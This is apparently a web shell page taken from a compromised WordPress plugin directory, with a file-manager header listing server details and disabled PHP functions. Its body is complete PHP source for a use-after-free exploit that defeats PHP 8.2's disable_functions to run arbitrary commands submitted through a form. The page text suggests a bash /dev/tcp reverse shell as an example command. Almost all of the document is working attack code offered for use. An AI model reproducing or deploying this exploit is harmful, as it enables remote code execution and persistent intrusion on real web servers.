HEX
Server: nginx/1.28.3
System: Linux VM-0-7-opencloudos 6.6.117-45.oc9.x86_64 #1 SMP Thu Dec 4 10:26:39 CST 2025 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/www.213n.cn/wp-content/plugins/Cexom/name/kamu/cmdkerenbypass.php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TimeAfterFree - Bypass CMD (Working on PHP 8.2.28)</title>
    <style>
        body {
            background-color: #007BFF;
            font-family: Arial, sans-serif;
            color: #FFFFFF;
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        form {
            background-color: #333;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }
        h1 {
            margin-bottom: 20px;
            font-size: 24px;
        }
        input[type="text"] {
            width: 400px;
            padding: 10px;
            border: none;
            border-radius: 5px;
            margin-right: 10px;
        }
        input[type="submit"] {
            padding: 10px 20px;
            background-color: #28a745;
            border: none;
            border-radius: 5px;
            color: #FFF;
            cursor: pointer;
            font-size: 16px;
        }
        input[type="submit"]:hover {
            background-color: #218838;
        }
        textarea {
            width: 90%;
            height: 400px;
            margin-top: 20px;
            padding: 10px;
            border-radius: 5px;
            border: none;
            background-color: #222;
            color: #FFF;
            font-family: monospace;
            white-space: pre-wrap;
        }
    </style>
</head>
<body>
    <form action="" method="post">
        <h1>TimeAfterFree CMD Executor</h1>
        <p>Masukkan command (contoh: id, whoami, uname -a, ls -la, atau reverse shell: bash -i >& /dev/tcp/IP_PORT 0>&1)</p>
        <input type="text" name="cmd" placeholder="Command here..." value="id" required>
        <input type="submit" value="Execute">
        <center>
            <textarea><?php
            if (isset($_POST['cmd']) && !empty(trim($_POST['cmd']))) {
                $cmd = trim($_POST['cmd']);

                // ==================== TimeAfterFree Exploit Code (dari PoC kamu) ====================
                class Logger
                {
                    private static $logging = true;
                    public static function log($format, ...$args)
                    {
                        if (!self::$logging) return;
                        printf($format . PHP_EOL, ...$args);
                    }
                }

                function alloc($size, $canary)
                {
                    return str_shuffle(str_repeat($canary, $size));
                }

                function ptr2str($addr, $n = 8)
                {
                    $s = '';
                    while ($n--) {
                        $s .= chr($addr & 0xff);
                        $addr >>= 8;
                    }
                    return $s;
                }

                class FreeMe
                {
                    private $pwn;
                    public function __construct($pwn)
                    {
                        $this->pwn = $pwn;
                    }
                    public function __destruct()
                    {
                        $this->pwn->helper = $this->pwn->array;
                    }
                }

                class Pwn
                {
                    private const zend_string_header = 0x18;
                    private const dateinterval_handlers_offset = PHP_VERSION_ID < 80500 ? 0x38 : 0x30;
                    private const dateinterval_properties_offset = PHP_VERSION_ID < 80500 ? 0x40 : 0x38;
                    private const zend_fe_size = PHP_VERSION_ID < 80400 ? 0x20 : 0x30;
                    private const zif_handler_offset = PHP_VERSION_ID < 80400 ? 0x80 : 0x90;

                    public $array;
                    public $helper;
                    private $interval;
                    private $allocator;

                    public function __construct($cmd)
                    {
                        $this->allocator = [];
                        $this->go($cmd);
                    }

                    private function go($cmd)
                    {
                        $interval_addr = $this->heap_leak();
                        Logger::log("[+] DateInterval @ 0x%x", $interval_addr);
                        $handlers = $this->read($interval_addr + self::dateinterval_handlers_offset);
                        Logger::log("[+] DateInterval handlers @ 0x%x", $handlers);
                        $standard_module = $this->get_standard_module($handlers);
                        Logger::log("[+] standard module @ 0x%x", $standard_module);
                        $standard_functions = $this->read($standard_module + 0x28);
                        Logger::log("[+] standard functions @ 0x%x", $standard_functions);
                        $system = $this->get_system($standard_functions);
                        Logger::log("[+] system @ 0x%x", $system);

                        @$this->interval->system1337 = function ($x) {};
                        $properties = $this->read($interval_addr + self::dateinterval_properties_offset);
                        $arData = $this->read($properties + 0x10);
                        $closure_index = -1;
                        do {
                            $closure_index += 1;
                            $offset = 32 * $closure_index + 0x18;
                            $key = $this->read($arData + $offset);
                            $str = ptr2str($this->read($key + self::zend_string_header));
                        } while ($str !== 'system13');
                        $closure_addr = $this->read($arData + 32 * $closure_index);
                        Logger::log("[+] closure @ 0x%x", $closure_addr);

                        $this->write($closure_addr + 0x38, 1, 4);
                        $this->write($closure_addr + self::zif_handler_offset, $system);

                        echo "\nExecuting command: $cmd\n\n";
                        ($this->interval->system1337)($cmd);

                        exit(0);  // Optional: stop setelah exec (atau hapus kalau mau lanjut)
                    }

                    // Sisanya fungsi heap_leak, write, read, get_standard_module, get_system sama persis seperti kode kamu
                    private function heap_leak() { /* copy dari kode kamu */ 
                        for ($i = 0; $i < 63; $i++) {
                            $this->allocator[] = new DateInterval('PT0S');
                        }
                        $a = "aaaa";
                        $this->array = [
                            $a,
                            new DateInterval('PT0S'),
                            new DateInterval('PT0S'),
                            new FreeMe($this),
                        ];
                        @$this->array .= 'x';
                        $addr = $this->helper[2]->y;
                        $this->allocator[] = alloc(0xa0 - self::zend_string_header - 1, "\x00");
                        $d1 = new DateInterval('PT0S');
                        $d2 = new DateInterval('PT0S');
                        $this->interval = new DateInterval('PT0S');
                        return $addr;
                    }

                    private function write($addr, $value, $bytes = 8) { /* copy */ 
                        $mask = $bytes >= 8 ? -1 : ((1 << ($bytes * 8)) - 1);
                        $a = "aaaa";
                        $this->array = [
                            $a,
                            new DateInterval('PT0S'),
                            new DateInterval('PT0S'),
                            new FreeMe($this),
                        ];
                        @$this->array .= 'x';
                        $block_addr = $this->helper[2]->y;
                        $this->helper[2]->y = $addr;
                        $this->helper[1]->y &= ~$mask;
                        $this->helper[1]->y |= ($value & $mask);
                        $this->helper[2]->y = $block_addr;
                        $r = $this->helper[1]->y;
                    }

                    private function read($addr, $bytes = 8) { /* copy */ 
                        $a = "aaaa";
                        $this->array = [
                            $a,
                            new DateInterval('PT0S'),
                            new DateInterval('PT0S'),
                            new FreeMe($this),
                        ];
                        @$this->array .= 'x';
                        $block_addr = $this->helper[2]->y;
                        $this->helper[2]->y = $addr;
                        $value = $this->helper[1]->y;
                        $this->helper[2]->y = $block_addr;
                        $r = $this->helper[1]->y;
                        if ($bytes !== 8) {
                            $value &= (1 << ($bytes << 3)) - 1;
                        }
                        return $value;
                    }

                    private function get_standard_module($addr) { /* copy */ 
                        while (true) {
                            $addr -= 0x10;
                            if ($this->read($addr, 4) === 0xa8 &&
                                in_array($this->read($addr + 4, 4),
                                    [20220829, 20230831, 20240924, 20250925])) {
                                $module_name_addr = $this->read($addr + 0x20);
                                $module_name = $this->read($module_name_addr);
                                if ($module_name === 0x647261646e617473) {
                                    return $addr;
                                }
                            }
                        }
                    }

                    private function get_system($standard_functions) { /* copy */ 
                        $addr = $standard_functions;
                        do {
                            $f_entry = $this->read($addr);
                            $f_name = $this->read($f_entry, 6);
                            if ($f_name === 0x6d6574737973) {
                                return $this->read($addr + 8);
                            }
                            $addr += self::zend_fe_size;
                        } while ($f_entry !== 0);
                    }
                }

                // Jalankan exploit dengan command dari form
                new Pwn($cmd);
            } else {
                echo "Masukkan command dan submit!";
            }
            ?></textarea>
        </center>
    </form>
</body>
</html>